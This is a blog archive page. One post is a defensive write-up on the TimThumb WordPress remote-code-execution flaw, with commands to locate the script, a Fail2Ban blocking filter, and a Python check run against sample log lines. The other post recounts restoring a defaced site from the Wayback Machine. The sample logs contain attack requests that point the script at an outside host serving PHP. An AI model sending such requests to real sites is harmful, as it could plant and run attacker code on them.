Tag Archives: Hackers

Timthumb.php Remote Execution Vulnerability in WordPress

This morning, while going through my e-mails, I saw that my IDS system was seeing a lot of attempts against a timthumb.php file on my web sites. This seemed a little suspicious, so I headed out to Google to see what was going on. I started searching on “timthumb.php” and very quickly, Google gave me a suggestion of “timthumb.php exploit”. Yep, my suspicions were warranted.

Vulnerability Explained

This is not a new vulnerability. The flaw that lets timthumb.php fetch a remote "image" was disclosed back in 2011, and a second remote-code-execution bug in the script's WebShot feature followed in 2014. The fact that attackers are still probing for it means there are still sites on the web running unpatched copies.

TimThumb is an image-resizing PHP script that ships inside many WordPress themes and plugins. The attacker abuses the script's remote-fetch feature: by pointing the src parameter at a host under their control, they make the script download a file that is named like an image but contains PHP, and the vulnerable versions wrote that download into the web-accessible cache directory, where it could then be executed. The following video does an excellent job of showing the exploit.

Am I At Risk?

The first task for me was to see whether this vulnerability affects me. I use Linux for all of my web servers. I was able to use one of the following commands to see if this code was implemented in any of my sites…

locate timthumb.php              # fast, but it reads the updatedb index, so a recently uploaded file may not show up until updatedb runs
cd /PATH_TO_WEB_SERVER_ROOT      # fill in with the actual path to your web server
find . -type f -name timthumb.php

Luckily, I did not find this being used in any of our themes. If you find this file in your environment, you might want to check out the post on the Sucuri Blog with tips for protecting your environment.


Block Them Anyway!

I am a strong advocate of the fact that even though a vulnerability doesn't exist on your system, you should still take action to block attempts. Someone was obviously making a malicious attempt to attack your site, and this is a clear piece of evidence as to how they do it. This attempt failed, but you can be sure they will keep trying until they find a way.

Another reason to do this is to protect against a site administrator installing a theme that bundles this vulnerable script in the future, without your knowledge. By putting the block in place now, you are covered if the vulnerability is later introduced into your environment.

With that in mind, I decided to again use my Fail2Ban system to block individuals attempting to access this URL. The filter configuration file was very simple.

[Definition]
failregex = ^<HOST> - .*\/timthumb\.php
ignoreregex =

I added this filter to my jail configuration and restarted Fail2Ban. Now, if anyone else attempts to access this URL, which we don't use, they will be automatically blocked from accessing our sites any further! Keep in mind that Fail2Ban bans an address only after the filter matches it maxretry times within findtime, so set those jail parameters (and bantime) to match how aggressive you want to be; a single probe will not trigger a ban unless maxretry is 1.
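To see what the filter does before it bans anyone, here is an added Python example (not code from the post and not Fail2Ban itself) that applies the failregex above to a few constructed Apache access-log lines the way Fail2Ban does, counts matches per client address, and reports which addresses would reach a jail's maxretry. The `<HOST>` stand-in, the sample log lines (documentation addresses), the findtime simplification and the function names are all assumptions made for the example.

```python
import re
from collections import Counter

# The filter from the post, exactly as written in the Fail2Ban filter file.
FAILREGEX = r"^<HOST> - .*\/timthumb\.php"

# Constructed Apache combined-log lines (RFC 5737 / RFC 3849 documentation
# addresses); they are not traffic from the post's servers.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2016:08:01:02 -0500] "GET /wp-content/themes/foo/timthumb.php?src=http://198.51.100.7/x.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Mar/2016:08:01:03 -0500] "GET /wp-content/themes/foo/thumb.php?src=http://198.51.100.7/x.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Mar/2016:08:01:04 -0500] "GET /wp-content/plugins/bar/timthumb.php?src=http://198.51.100.7/x.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2016:08:05:00 -0500] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2016:08:05:09 -0500] "GET /timthumb.php HTTP/1.1" 404 209 "-" "curl/7.47.0"
2001:db8::5 - - [12/Mar/2016:08:07:00 -0500] "GET /wp-content/themes/foo/TimThumb.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
"""


def compile_failregex(failregex: str) -> re.Pattern:
    """Turn a Fail2Ban failregex into a Python pattern.

    Fail2Ban expands the <HOST> tag into its own host-matching expression;
    this stand-in accepts any run of non-space characters (an IPv4 or IPv6
    literal as Apache logs it), which is a simplification of the real tag.
    """
    return re.compile(failregex.replace("<HOST>", r"(?P<host>\S+)"))


def hits_per_host(log_text: str, failregex: str = FAILREGEX) -> Counter:
    """Count failregex matches per client address in one pass over the log."""
    pattern = compile_failregex(failregex)
    hits = Counter()
    for line in log_text.splitlines():
        m = pattern.search(line)
        if m:
            hits[m.group("host")] += 1
    return hits


def hosts_to_ban(log_text: str, maxretry: int, failregex: str = FAILREGEX) -> list:
    """Addresses that reached the jail's maxretry.

    findtime (the window the retries must fall within) is ignored here; every
    line in the sample is treated as falling inside a single window.
    """
    hits = hits_per_host(log_text, failregex)
    return sorted(host for host, n in hits.items() if n >= maxretry)


if __name__ == "__main__":
    for host, n in hits_per_host(SAMPLE_LOG).most_common():
        print(f"{host:15} {n} hit(s)")
    print("ban with maxretry=2:", hosts_to_ban(SAMPLE_LOG, maxretry=2))
```

Two things the sample shows about the filter as written: it is case-sensitive, so the request for TimThumb.php is not counted (prefix the pattern with `(?i)` if you want it to be), and it only matches the file name timthumb.php, so the request for thumb.php, a name some themes use for the same script, also slips past. Against the real log file, `fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/timthumb.conf` (the filter file name is an assumption; use whatever you named yours) reports the same match counts from Fail2Ban's own engine.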

Gone, But Not Forgotten

The Call

The other day, I got “the call” from a prospective client. Their web site had been hacked and the hacker changed their home page. They had made both text and graphic changes to the page to promote their own personal cause. They needed to fix this fast!

Naturally, what else happens in an emergency? We learned that the backups hadn't been running for almost two months. It never fails: you always learn these things at the wrong time.

An Unlikely Solution

While working through this issue for this company, I remembered something that I had seen in one of my Certified Ethical Hacker (CEH) study guides. There is a site called The Internet Archive that periodically takes snapshots of web sites over time and stores them. You can go to the site, look up a given web page and see all of the snapshots that were taken. They call it the Wayback Machine.

Wayback Machine Screenshot

I looked and was surprised to see captures of my old consulting company web site. It’s amazing the amount of information out there.

A Happy Ending

Through this tool and other backup resources, we were able to get this customer back on the right path to recovering their home page. This tool is not a replacement for your backups, but it can help in tough situations.

To learn more about the Internet Archive, go to http://www.archive.org